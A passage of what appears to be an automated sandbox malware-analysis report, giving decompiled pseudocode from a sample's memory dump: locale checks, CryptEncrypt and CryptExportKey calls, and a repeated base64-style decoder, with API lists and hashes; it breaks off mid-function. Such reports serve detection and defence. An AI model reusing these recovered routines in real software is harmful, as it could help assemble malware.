                          • Opcode ID: e7512af1bbd57bae6df0a79961eeaea1459de05111e5f9b11af7cf25e690a2ad
                          • Instruction ID: 2a5790b587ae120f16d4f74a302631aff6c552d95782837dbe63752c04d37472
                          • Opcode Fuzzy Hash: e7512af1bbd57bae6df0a79961eeaea1459de05111e5f9b11af7cf25e690a2ad
                          • Instruction Fuzzy Hash: 11814A71D10209DFDB14CFA8D884AEEFBB5FF58318F64462AE405B7254E774AA84CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E0135E571(void* __ecx, void* __edx, void* __eflags, signed int* _a4) {
                          				void* __ebp;
                          				intOrPtr _t26;
                          				intOrPtr _t29;
                          				signed int _t32;
                          				signed char _t33;
                          				signed char _t34;
                          				intOrPtr* _t38;
                          				intOrPtr* _t41;
                          				signed int _t47;
                          				void* _t50;
                          				void* _t51;
                          				signed int* _t52;
                          				void* _t53;
                          				signed int _t62;
                          
                          				_t53 = E013559E0(__ecx, __edx);
                          				_t47 = 2;
                          				_t38 =  *((intOrPtr*)(_t53 + 0x50));
                          				_t50 = _t38 + 2;
                          				do {
                          					_t26 =  *_t38;
                          					_t38 = _t38 + _t47;
                          				} while (_t26 != 0);
                          				_t41 =  *((intOrPtr*)(_t53 + 0x54));
                          				 *(_t53 + 0x60) = 0 | _t38 - _t50 >> 0x00000001 == 0x00000003;
                          				_t51 = _t41 + 2;
                          				do {
                          					_t29 =  *_t41;
                          					_t41 = _t41 + _t47;
                          				} while (_t29 != 0);
                          				_t52 = _a4;
                          				 *(_t53 + 0x64) = 0 | _t41 - _t51 >> 0x00000001 == 0x00000003;
                          				_t52[1] = 0;
                          				if( *(_t53 + 0x60) == 0) {
                          					_t47 = E0135E66B( *((intOrPtr*)(_t53 + 0x50)));
                          				}
                          				 *(_t53 + 0x5c) = _t47;
                          				_t32 = EnumSystemLocalesW(0x135e697, 1);
                          				_t62 =  *_t52 & 0x00000007;
                          				asm("bt ecx, 0x9");
                          				_t33 = _t32 & 0xffffff00 | _t62 > 0x00000000;
                          				asm("bt ecx, 0x8");
                          				_t34 = _t33 & 0xffffff00 | _t62 > 0x00000000;
                          				if((_t34 & (_t47 & 0xffffff00 | _t62 != 0x00000000) & _t33) == 0) {
                          					 *_t52 = 0;
                          					return _t34;
                          				}
                          				return _t34;
                          			}

                          APIs
                            • Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
                            • Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83
                          • EnumSystemLocalesW.KERNEL32(0135E697,00000001,00000000,?,-00000050,?,0135ECC5,00000000,?,?,?,00000055,?), ref: 0135E5E3
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          • Opcode ID: c4390155d611f5b7fc53e71ee8c00b248d5beeb6ea737055e11ee2d676625b9d
                          • Instruction ID: 7a94b481ad8bf001853e19b212323dd23432895f6763c9a6339010793431912f
                          • Opcode Fuzzy Hash: c4390155d611f5b7fc53e71ee8c00b248d5beeb6ea737055e11ee2d676625b9d
                          • Instruction Fuzzy Hash: FD11063B2007059FDB189F39C89197ABBA2FB80B6DB15483CD94687A00E371B602C740
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 48%
                          			E01311F20(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                          				char _v8;
                          				char _v16;
                          				signed int _v20;
                          				void* _v24;
                          				intOrPtr _v28;
                          				char _v44;
                          				intOrPtr _v48;
                          				void* __esi;
                          				signed int _t22;
                          				signed int _t23;
                          				intOrPtr _t31;
                          				intOrPtr _t46;
                          				void* _t47;
                          				signed int _t48;
                          
                          				_push(0xffffffff);
                          				_push(0x1367b2d);
                          				_push( *[fs:0x0]);
                          				_t22 =  *0x13a4018; // 0x39cca9f6
                          				_t23 = _t22 ^ _t48;
                          				_v20 = _t23;
                          				_push(_t23);
                          				 *[fs:0x0] =  &_v16;
                          				_t46 = _a4;
                          				_v48 = _t46;
                          				E012F7D00(__ebx,  &_v44, __edx, 0x104);
                          				_v8 = 0;
                          				_t27 =  >=  ? _v44 :  &_v44;
                          				E013034B0(__ebx,  &_v44, __edi, GetLocaleInfoA(0x400, 0x1001,  >=  ? _v44 :  &_v44, 0x104), 0);
                          				_t31 = _v28 - 1;
                          				_v28 = _t31;
                          				_t38 =  >=  ? _v44 :  &_v44;
                          				( >=  ? _v44 :  &_v44)[_t31] = 0;
                          				asm("movups xmm0, [ebp-0x28]");
                          				 *((intOrPtr*)(_t46 + 0x10)) = 0;
                          				 *((intOrPtr*)(_t46 + 0x14)) = 0;
                          				asm("movups [esi], xmm0");
                          				asm("movq xmm0, [ebp-0x18]");
                          				asm("movq [esi+0x10], xmm0");
                          				 *[fs:0x0] = _v16;
                          				_t47 = 0;
                          				return E0132EA79(_v20 ^ _t48, _t47);
                          			}

                          APIs
                          • GetLocaleInfoA.KERNEL32(00000400,00001001,39CCA9F6,00000104,00000104,00000000,39CCA9F6,00000000,01396CA4,00000002,01396C64), ref: 01311F80
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: 671653106b928f4c1d56c605f3aff07a74414f1fb5bac8576518b897d02fb622
                          • Instruction ID: 17b9124181bf23e778e6b81f2bdff9b6cc334be62c3d82ca3994ecef0d0b1cf3
                          • Opcode Fuzzy Hash: 671653106b928f4c1d56c605f3aff07a74414f1fb5bac8576518b897d02fb622
                          • Instruction Fuzzy Hash: 30214A71900649DBDB11DFA8C851BEEFBB4FB18714F10561AE6127B280DBB06684CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0135E60C(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
                          				void* __ebp;
                          				intOrPtr _t11;
                          				signed char* _t15;
                          				intOrPtr* _t19;
                          				intOrPtr _t24;
                          				void* _t25;
                          				void* _t26;
                          
                          				_t26 = E013559E0(__ecx, __edx);
                          				_t24 = 2;
                          				_t19 =  *((intOrPtr*)(_t26 + 0x50));
                          				_t25 = _t19 + 2;
                          				do {
                          					_t11 =  *_t19;
                          					_t19 = _t19 + _t24;
                          				} while (_t11 != 0);
                          				_t4 = _t19 - _t25 >> 1 == 3;
                          				 *(_t26 + 0x60) = 0 | _t4;
                          				if(_t4 != 0) {
                          					_t24 = E0135E66B( *((intOrPtr*)(_t26 + 0x50)));
                          				}
                          				 *((intOrPtr*)(_t26 + 0x5c)) = _t24;
                          				EnumSystemLocalesW(0x135e8ea, 1);
                          				_t15 = _a4;
                          				if(( *_t15 & 0x00000004) == 0) {
                          					 *_t15 = 0;
                          					return _t15;
                          				}
                          				return _t15;
                          			}











                          APIs
                            • Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
                            • Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83
                          • EnumSystemLocalesW.KERNEL32(0135E8EA,00000001,00000000,?,-00000050,?,0135EC89,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0135E656
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          • Opcode ID: 94ff70e9ac39e091e2ab9961187dab91be4aaf43c096f29d2d7823271d7f7411
                          • Instruction ID: 780a5d196af663bf4bee731f1644a480a0b48f76450cc4263cb1d37e6cdd779a
                          • Opcode Fuzzy Hash: 94ff70e9ac39e091e2ab9961187dab91be4aaf43c096f29d2d7823271d7f7411
                          • Instruction Fuzzy Hash: CAF0C2362003059FDB246F399891E6ABB95FB80FBCF05447CED454B640D675A902D760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01355CD6(void* __eflags) {
                          				intOrPtr _t17;
                          				signed int _t26;
                          				void* _t28;
                          
                          				E0132F8E0(0x13a1b10, 0xc);
                          				 *(_t28 - 0x1c) =  *(_t28 - 0x1c) & 0x00000000;
                          				E0134BB42( *((intOrPtr*)( *((intOrPtr*)(_t28 + 8)))));
                          				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                          				 *0x13ab4a0 = E01352AA9( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t28 + 0xc)))))));
                          				_t26 = EnumSystemLocalesW(0x1355cc9, 1);
                          				_t17 =  *0x13a4018; // 0x39cca9f6
                          				 *0x13ab4a0 = _t17;
                          				 *(_t28 - 0x1c) = _t26;
                          				 *(_t28 - 4) = 0xfffffffe;
                          				E01355D46();
                          				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0x10));
                          				return _t26;
                          			}







                          APIs
                            • Part of subcall function 0134BB42: EnterCriticalSection.KERNEL32(?,?,01357EFA,?,013A1BB8,0000000C), ref: 0134BB51
                          • EnumSystemLocalesW.KERNEL32(01355CC9,00000001,013A1B10,0000000C,01356134,00000000), ref: 01355D0E
                          Similarity
                          • API ID: CriticalEnterEnumLocalesSectionSystem
                          • String ID:
                          • API String ID: 1272433827-0
                          • Opcode ID: 70f487d37f082400ff66909ba2a20dc073c92670eca74aae9e45327dc7bfd412
                          • Instruction ID: 866ad89df1477def94b5b5a256bb05b39b286bf64115169de708be9f3109cf9d
                          • Opcode Fuzzy Hash: 70f487d37f082400ff66909ba2a20dc073c92670eca74aae9e45327dc7bfd412
                          • Instruction Fuzzy Hash: 2EF04976A40205DFDB20EF9CE441B9DBBF4FB14B29F00412AE8119B394DBB56900DB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0135E526(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
                          				void* __ebp;
                          				intOrPtr _t9;
                          				signed char* _t13;
                          				intOrPtr* _t15;
                          				void* _t19;
                          				void* _t21;
                          
                          				_t19 = E013559E0(__ecx, __edx);
                          				_t15 =  *((intOrPtr*)(_t19 + 0x54));
                          				_t21 = _t15 + 2;
                          				do {
                          					_t9 =  *_t15;
                          					_t15 = _t15 + 2;
                          				} while (_t9 != 0);
                          				 *(_t19 + 0x64) = 0 | _t15 - _t21 >> 0x00000001 == 0x00000003;
                          				EnumSystemLocalesW(0x135e47f, 1);
                          				_t13 = _a4;
                          				if(( *_t13 & 0x00000004) == 0) {
                          					 *_t13 = 0;
                          					return _t13;
                          				}
                          				return _t13;
                          			}










                          APIs
                            • Part of subcall function 013559E0: GetLastError.KERNEL32(?,?,?,01349740,013A18F0,0000000C), ref: 013559E5
                            • Part of subcall function 013559E0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,01349740,013A18F0,0000000C), ref: 01355A83
                          • EnumSystemLocalesW.KERNEL32(0135E47F,00000001,00000000,?,?,0135ECE7,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0135E55D
                          Similarity
                          • API ID: ErrorLast$EnumLocalesSystem
                          • String ID:
                          • API String ID: 2417226690-0
                          • Opcode ID: 73668f4b74b3bcf63762c694e27fc8c93a955058f5b6ff6908b7bcb72b8830b1
                          • Instruction ID: 95a37174e9adb8254037af41c41070f723bf256030bddb3ca78ec32492adb2f0
                          • Opcode Fuzzy Hash: 73668f4b74b3bcf63762c694e27fc8c93a955058f5b6ff6908b7bcb72b8830b1
                          • Instruction Fuzzy Hash: 79F0553630020997CB14AF39E805E6ABF98EFC1B68F060068EE058B241E235E943C790
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 16%
                          			E01309150(intOrPtr _a4, signed char _a8, char _a12) {
                          				signed int _v8;
                          				char _v12;
                          				signed int _t9;
                          				void* _t19;
                          				signed int _t20;
                          
                          				_t9 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t9 ^ _t20;
                          				_v12 = _a12;
                          				__imp__CryptEncrypt(0, _a8 & 0x000000ff, 0, 0,  &_v12, 0);
                          				asm("sbb eax, eax");
                          				return E0132EA79(_v8 ^ _t20, _t19, _a4);
                          			}









                          APIs
                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0130917A
                          Similarity
                          • API ID: CryptEncrypt
                          • String ID:
                          • API String ID: 1352496322-0
                          • Opcode ID: f62a711588614bcce16b5cc873bd396835356ed2ca0fe334648acebfd9b68081
                          • Instruction ID: 69b5ad3b38486017f25cef296ff3e264a6119916934322a5752515daf81269b4
                          • Opcode Fuzzy Hash: f62a711588614bcce16b5cc873bd396835356ed2ca0fe334648acebfd9b68081
                          • Instruction Fuzzy Hash: 8DF0E57265420CFBDB20DFA8DC42FAEBBB8AB04701F504166F905DB1C0D670AB54AB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 16%
                          			E0130A050(intOrPtr _a4) {
                          				signed int _v8;
                          				char _v12;
                          				signed int _t7;
                          				void* _t15;
                          				signed int _t16;
                          
                          				_t7 =  *0x13a4018; // 0x39cca9f6
                          				_v8 = _t7 ^ _t16;
                          				_v12 = 0;
                          				__imp__CryptExportKey(0, 8, 0, 0,  &_v12);
                          				asm("sbb eax, eax");
                          				return E0132EA79(_v8 ^ _t16, _t15, _a4);
                          			}









                          APIs
                          • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 0130A076
                          Similarity
                          • API ID: CryptExport
                          • String ID:
                          • API String ID: 3389274496-0
                          • Opcode ID: 7fc380813273ba135e77201ba59d2f1391438be55074a958f43f7f23b39e0522
                          • Instruction ID: 1f83855b237de7c0c1de81ae1c2927b3013d8630c6c103c244fb7e6da3358d89
                          • Opcode Fuzzy Hash: 7fc380813273ba135e77201ba59d2f1391438be55074a958f43f7f23b39e0522
                          • Instruction Fuzzy Hash: DDE01271A9020CBBDB20DFA4DC46F9DBBB8BB14701F504165E901A71C0DA707A589B44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,01354C44,?,20001004,00000000,00000002,?,?,01354251), ref: 013562C3
                          Similarity
                          • API ID: InfoLocale
                          • String ID:
                          • API String ID: 2299586839-0
                          • Opcode ID: de11e0cd52ab4ceca7692e38d1943fc99ae30eba8a1bd5c9a052575555b98354
                          • Instruction ID: ddf0465f597fe790a17a15b9d57c158cdb9ee2189358acdeedddd16ef06d645b
                          • Opcode Fuzzy Hash: de11e0cd52ab4ceca7692e38d1943fc99ae30eba8a1bd5c9a052575555b98354
                          • Instruction Fuzzy Hash: ECE0867654121DBBDF622F64DC05EAE7F6AEF44F60F044014FD0565120CB3299319BD0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000001,?,00000000,?,01309CBE,?,00000001,?,00000000,?,00000000,?), ref: 0130A0C2
                          Similarity
                          • API ID: CryptEncrypt
                          • String ID:
                          • API String ID: 1352496322-0
                          • Opcode ID: 8f878edbe1e821ab5670b989743aa757361a32d0e35e0079f1474617f5a2f7fe
                          • Instruction ID: 461fd789b9bb9580151cb8fc61de434f7711ba1f892b2459be40a6fd84c37330
                          • Opcode Fuzzy Hash: 8f878edbe1e821ab5670b989743aa757361a32d0e35e0079f1474617f5a2f7fe
                          • Instruction Fuzzy Hash: 45E0EC3115020DAFEB25CF95DC06FAA3BADAB15710F008014FA118A1E1D771E960EB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000001,?,01309CA4,00000000,?,00000000,00000000,00000000,?,00000001,00000000), ref: 0130A0FC
                          Similarity
                          • API ID: CryptExport
                          • String ID:
                          • API String ID: 3389274496-0
                          • Opcode ID: 936ac93209a31c8e5946286b51eaf988262dadbb049f3000dda1025c0613fa72
                          • Instruction ID: 7052359b4cd599c4c9397045de480d6a1f1d8ed42ab90101a032128365babd44
                          • Opcode Fuzzy Hash: 936ac93209a31c8e5946286b51eaf988262dadbb049f3000dda1025c0613fa72
                          • Instruction Fuzzy Hash: 0DD01730290309EFE724CE44EC0AF6A37ADBB10B11F048018BA008B1E0D7B1F950DB54
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E012F9180(intOrPtr __ecx, intOrPtr* __edx) {
                          				intOrPtr _v8;
                          				char _v16;
                          				intOrPtr _v17;
                          				unsigned char _v18;
                          				signed char _v20;
                          				char _v22;
                          				char _v23;
                          				char _v24;
                          				char _v25;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				char _v40;
                          				intOrPtr* _v44;
                          				intOrPtr _v48;
                          				intOrPtr _v52;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t59;
                          				intOrPtr _t62;
                          				intOrPtr* _t63;
                          				intOrPtr _t64;
                          				signed int _t65;
                          				signed int _t66;
                          				signed char _t67;
                          				intOrPtr* _t73;
                          				void* _t76;
                          				intOrPtr* _t77;
                          				char _t78;
                          				signed int _t79;
                          				signed int _t80;
                          				signed char _t81;
                          				intOrPtr _t87;
                          				intOrPtr* _t89;
                          				void* _t92;
                          				intOrPtr _t93;
                          				intOrPtr _t95;
                          				intOrPtr _t97;
                          				intOrPtr _t101;
                          				intOrPtr _t102;
                          				intOrPtr _t113;
                          				unsigned char _t126;
                          				unsigned char _t133;
                          				intOrPtr _t136;
                          				void* _t138;
                          				void* _t139;
                          				void* _t142;
                          				intOrPtr _t144;
                          				void* _t146;
                          				void* _t148;
                          				void* _t149;
                          				signed int _t150;
                          				void* _t151;
                          				void* _t152;
                          
                          				_t121 = __edx;
                          				_push(0xffffffff);
                          				_push(0x136586e);
                          				_push( *[fs:0x0]);
                          				_t152 = _t151 - 0x24;
                          				_t59 =  *0x13a4018; // 0x39cca9f6
                          				_push(_t59 ^ _t150);
                          				 *[fs:0x0] =  &_v16;
                          				_t89 = __edx;
                          				_v44 = __edx;
                          				_t62 = __ecx;
                          				_v32 = __ecx;
                          				_v36 = __ecx;
                          				_v52 = __ecx;
                          				_t144 = 0;
                          				_v40 = 0;
                          				_t136 = 0;
                          				_t97 =  *((intOrPtr*)(__edx + 0x10));
                          				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                          				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
                          				 *((char*)(__ecx)) = 0;
                          				_v8 = 0;
                          				_v40 = 1;
                          				if(_t97 == 0) {
                          					L36:
                          					 *[fs:0x0] = _v16;
                          					return _t62;
                          				} else {
                          					while(1) {
                          						_t63 = _t89;
                          						_v36 = _t97 - 1;
                          						_t101 =  *((intOrPtr*)(_t89 + 0x14));
                          						if(_t101 >= 0x10) {
                          							_t63 =  *_t89;
                          						}
                          						if( *((char*)(_t63 + _t136)) == 0x3d) {
                          							break;
                          						}
                          						_t73 = _t89;
                          						if(_t101 >= 0x10) {
                          							_t73 =  *_t89;
                          						}
                          						_t74 =  *((intOrPtr*)(_t73 + _t136));
                          						_v25 =  *((intOrPtr*)(_t73 + _t136));
                          						_t76 = E01349C70(_t89, _t101, _t121, _t74 & 0x000000ff);
                          						_t152 = _t152 + 4;
                          						if(_t76 != 0) {
                          							L9:
                          							_t77 = _t89;
                          							if( *((intOrPtr*)(_t89 + 0x14)) >= 0x10) {
                          								_t77 =  *_t89;
                          							}
                          							_t78 =  *((intOrPtr*)(_t77 + _t136));
                          							_t136 = _t136 + 1;
                          							 *((char*)(_t150 + _t144 - 0x10)) = _t78;
                          							_t144 = _t144 + 1;
                          							_v48 = _t136;
                          							if(_t144 == 4) {
                          								_t113 =  *0x13a4b94; // 0x0
                          								_t148 = 0;
                          								do {
                          									_t79 =  *(_t150 + _t148 - 0x10);
                          									_t142 =  >=  ?  *0x13a4b84 : 0x13a4b84;
                          									if(_t113 == 0) {
                          										L16:
                          										_t80 = _t79 | 0xffffffff;
                          									} else {
                          										_t79 = E01347A30(0x13a4b84, _t79, _t113);
                          										_t152 = _t152 + 0xc;
                          										if(_t79 == 0) {
                          											goto L16;
                          										} else {
                          											_t80 = _t79 - 0x13a4b84;
                          										}
                          									}
                          									_t113 =  *0x13a4b94; // 0x0
                          									 *(_t150 + _t148 - 0x10) = _t80;
                          									_t148 = _t148 + 1;
                          								} while (_t148 < 4);
                          								_t81 = _v20;
                          								_t95 = _v32;
                          								_v24 = (_t81 >> 0x00000004 & 0x00000003) + (_t81 << 2);
                          								_t133 = _v18;
                          								_t121 = (_t133 << 6) + _v17;
                          								_v22 = (_t133 << 6) + _v17;
                          								_t149 = 0;
                          								_v23 = (_t133 >> 0x00000002 & 0x0000000f) + (_t81 << 4);
                          								do {
                          									E012FC280(_t95, _t95, _t142, _t149,  *(_t150 + _t149 - 0x14) & 0x000000ff);
                          									_t149 = _t149 + 1;
                          								} while (_t149 < 3);
                          								_t89 = _v44;
                          								_t144 = 0;
                          								_t136 = _v48;
                          							}
                          							_t97 = _v36;
                          							if(_t97 != 0) {
                          								continue;
                          							}
                          						} else {
                          							_t87 = _v25;
                          							if(_t87 == 0x2b || _t87 == 0x2f) {
                          								goto L9;
                          							}
                          						}
                          						break;
                          					}
                          					if(_t144 == 0) {
                          						L35:
                          						_t62 = _v32;
                          						goto L36;
                          					} else {
                          						_t64 = _t144;
                          						if(_t144 < 4) {
                          							do {
                          								 *((char*)(_t150 + _t64 - 0x10)) = 0;
                          								_t64 = _t64 + 1;
                          							} while (_t64 < 4);
                          						}
                          						_t102 =  *0x13a4b94; // 0x0
                          						_t138 = 0;
                          						do {
                          							_t65 =  *(_t150 + _t138 - 0x10);
                          							_t92 =  >=  ?  *0x13a4b84 : 0x13a4b84;
                          							if(_t102 == 0) {
                          								L29:
                          								_t66 = _t65 | 0xffffffff;
                          							} else {
                          								_t65 = E01347A30(0x13a4b84, _t65, _t102);
                          								_t152 = _t152 + 0xc;
                          								if(_t65 == 0) {
                          									goto L29;
                          								} else {
                          									_t66 = _t65 - _t92;
                          								}
                          							}
                          							_t102 =  *0x13a4b94; // 0x0
                          							 *(_t150 + _t138 - 0x10) = _t66;
                          							_t138 = _t138 + 1;
                          						} while (_t138 < 4);
                          						_t67 = _v20;
                          						_t46 = _t144 - 1; // -1
                          						_t139 = _t46;
                          						_v24 = (_t67 >> 0x00000004 & 0x00000003) + (_t67 << 2);
                          						_t146 = 0;
                          						_t126 = _v18;
                          						_v22 = (_t126 << 6) + _v17;
                          						_v23 = (_t126 >> 0x00000002 & 0x0000000f) + (_t67 << 4);
                          						if(_t139 == 0) {
                          							goto L35;
                          						} else {
                          							_t93 = _v32;
                          							do {
                          								E012FC280(_t93, _t93, _t139, _t146,  *(_t150 + _t146 - 0x14) & 0x000000ff);
                          								_t146 = _t146 + 1;
                          							} while (_t146 < _t139);
                          							 *[fs:0x0] = _v16;
                          							return _t93;
                          						}
                          					}
                          				}
                          			}

                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 96%
                          			E01310610(intOrPtr __ecx, intOrPtr* __edx) {
                          				intOrPtr _v8;
                          				char _v16;
                          				intOrPtr _v17;
                          				unsigned char _v18;
                          				signed char _v20;
                          				char _v22;
                          				char _v23;
                          				char _v24;
                          				char _v25;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				char _v40;
                          				intOrPtr* _v44;
                          				intOrPtr _v48;
                          				intOrPtr _v52;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t59;
                          				intOrPtr _t62;
                          				intOrPtr* _t63;
                          				intOrPtr _t64;
                          				signed int _t65;
                          				signed int _t66;
                          				signed char _t67;
                          				intOrPtr* _t73;
                          				void* _t76;
                          				intOrPtr* _t77;
                          				char _t78;
                          				signed int _t79;
                          				signed int _t80;
                          				signed char _t81;
                          				intOrPtr _t87;
                          				intOrPtr* _t89;
                          				void* _t92;
                          				intOrPtr _t93;
                          				intOrPtr _t95;
                          				intOrPtr _t97;
                          				intOrPtr _t101;
                          				intOrPtr _t102;
                          				intOrPtr _t113;
                          				unsigned char _t126;
                          				unsigned char _t133;
                          				intOrPtr _t136;
                          				void* _t138;
                          				void* _t139;
                          				void* _t142;
                          				intOrPtr _t144;
                          				void* _t146;
                          				void* _t148;
                          				void* _t149;
                          				signed int _t150;
                          				void* _t151;
                          				void* _t152;
                          
                          				_t121 = __edx;
                          				_push(0xffffffff);
                          				_push(0x136586e);
                          				_push( *[fs:0x0]);
                          				_t152 = _t151 - 0x24;
                          				_t59 =  *0x13a4018; // 0x39cca9f6
                          				_push(_t59 ^ _t150);
                          				 *[fs:0x0] =  &_v16;
                          				_t89 = __edx;
                          				_v44 = __edx;
                          				_t62 = __ecx;
                          				_v32 = __ecx;
                          				_v36 = __ecx;
                          				_v52 = __ecx;
                          				_t144 = 0;
                          				_v40 = 0;
                          				_t136 = 0;
                          				_t97 =  *((intOrPtr*)(__edx + 0x10));
                          				 *((intOrPtr*)(__ecx + 0x10)) = 0;
                          				 *((intOrPtr*)(__ecx + 0x14)) = 0xf;
                          				 *((char*)(__ecx)) = 0;
                          				_v8 = 0;
                          				_v40 = 1;
                          				if(_t97 == 0) {
                          					L36:
                          					 *[fs:0x0] = _v16;
                          					return _t62;
                          				} else {
                          					while(1) {
                          						_t63 = _t89;
                          						_v36 = _t97 - 1;
                          						_t101 =  *((intOrPtr*)(_t89 + 0x14));
                          						if(_t101 >= 0x10) {
                          							_t63 =  *_t89;
                          						}
                          						if( *((char*)(_t63 + _t136)) == 0x3d) {
                          							break;
                          						}
                          						_t73 = _t89;
                          						if(_t101 >= 0x10) {
                          							_t73 =  *_t89;
                          						}
                          						_t74 =  *((intOrPtr*)(_t73 + _t136));
                          						_v25 =  *((intOrPtr*)(_t73 + _t136));
                          						_t76 = E01349C70(_t89, _t101, _t121, _t74 & 0x000000ff);
                          						_t152 = _t152 + 4;
                          						if(_t76 != 0) {
                          							L9:
                          							_t77 = _t89;
                          							if( *((intOrPtr*)(_t89 + 0x14)) >= 0x10) {
                          								_t77 =  *_t89;
                          							}
                          							_t78 =  *((intOrPtr*)(_t77 + _t136));
                          							_t136 = _t136 + 1;
                          							 *((char*)(_t150 + _t144 - 0x10)) = _t78;
                          							_t144 = _t144 + 1;
                          							_v48 = _t136;
                          							if(_t144 == 4) {
                          								_t113 =  *0x13a60ac; // 0x0
                          								_t148 = 0;
                          								do {
                          									_t79 =  *(_t150 + _t148 - 0x10);
                          									_t142 =  >=  ?  *0x13a609c : 0x13a609c;
                          									if(_t113 == 0) {
                          										L16:
                          										_t80 = _t79 | 0xffffffff;
                          									} else {
                          										_t79 = E01347A30(0x13a609c, _t79, _t113);
                          										_t152 = _t152 + 0xc;
                          										if(_t79 == 0) {
                          											goto L16;
                          										} else {
                          											_t80 = _t79 - 0x13a609c;
                          										}
                          									}
                          									_t113 =  *0x13a60ac; // 0x0
                          									 *(_t150 + _t148 - 0x10) = _t80;
                          									_t148 = _t148 + 1;
                          								} while (_t148 < 4);
                          								_t81 = _v20;
                          								_t95 = _v32;
                          								_v24 = (_t81 >> 0x00000004 & 0x00000003) + (_t81 << 2);
                          								_t133 = _v18;
                          								_t121 = (_t133 << 6) + _v17;
                          								_v22 = (_t133 << 6) + _v17;
                          								_t149 = 0;
                          								_v23 = (_t133 >> 0x00000002 & 0x0000000f) + (_t81 << 4);
                          								do {
                          									E012FC280(_t95, _t95, _t142, _t149,  *(_t150 + _t149 - 0x14) & 0x000000ff);
                          									_t149 = _t149 + 1;
                          								} while (_t149 < 3);
                          								_t89 = _v44;
                          								_t144 = 0;
                          								_t136 = _v48;
                          							}
                          							_t97 = _v36;
                          							if(_t97 != 0) {
                          								continue;
                          							}
                          						} else {
                          							_t87 = _v25;
                          							if(_t87 == 0x2b || _t87 == 0x2f) {
                          								goto L9;
                          							}
                          						}
                          						break;
                          					}
                          					if(_t144 == 0) {
                          						L35:
                          						_t62 = _v32;
                          						goto L36;
                          					} else {
                          						_t64 = _t144;
                          						if(_t144 < 4) {
                          							do {
                          								 *((char*)(_t150 + _t64 - 0x10)) = 0;
                          								_t64 = _t64 + 1;
                          							} while (_t64 < 4);
                          						}
                          						_t102 =  *0x13a60ac; // 0x0
                          						_t138 = 0;
                          						do {
                          							_t65 =  *(_t150 + _t138 - 0x10);
                          							_t92 =  >=  ?  *0x13a609c : 0x13a609c;
                          							if(_t102 == 0) {
                          								L29:
                          								_t66 = _t65 | 0xffffffff;
                          							} else {
                          								_t65 = E01347A30(0x13a609c, _t65, _t102);
                          								_t152 = _t152 + 0xc;
                          								if(_t65 == 0) {
                          									goto L29;
                          								} else {
                          									_t66 = _t65 - _t92;
                          								}
                          							}
                          							_t102 =  *0x13a60ac; // 0x0
                          							 *(_t150 + _t138 - 0x10) = _t66;
                          							_t138 = _t138 + 1;
                          						} while (_t138 < 4);
                          						_t67 = _v20;
                          						_t46 = _t144 - 1; // -1
                          						_t139 = _t46;
                          						_v24 = (_t67 >> 0x00000004 & 0x00000003) + (_t67 << 2);
                          						_t146 = 0;
                          						_t126 = _v18;
